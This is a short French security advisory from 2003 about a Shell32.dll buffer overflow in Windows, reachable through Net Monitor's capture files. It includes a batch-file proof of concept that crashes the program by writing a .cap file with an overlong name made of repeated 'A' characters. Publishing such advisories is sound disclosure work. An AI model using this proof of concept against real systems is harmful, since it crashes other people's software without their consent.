Date de Publication: 2003-05-31
 Titre: Microsoft Windows Shell32.dll Buffer overflow
 K-Otik ID : 0133
 Exploitable à distance : Oui
 Exploitable en local : Oui

 
 * Description Technique - Exploit *
 
Net Monitor est un outil d'analyse du trafic. Il intègre une option de capture (.cap) : en essayant d'ouvrir un fichier de capture d'une longueur supérieure à 252 bytes Net Monitor plante. Le crash peut être réalisé grâce à l'exploit :

------------------------------------------- Exploit.bat --------------------------------------------
SET A=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

echo eso > \\?\C:\%A%.cap
----------------------------------------------------------------------------------------------------


  * Versions Vulnérables *

Shell32.dll version 5.0.3502.5436
 

  * Solution *

Aucun Patch Officiel.


  * Crédits *
 
Faille découverte par David F. Madrid (Mai 2003).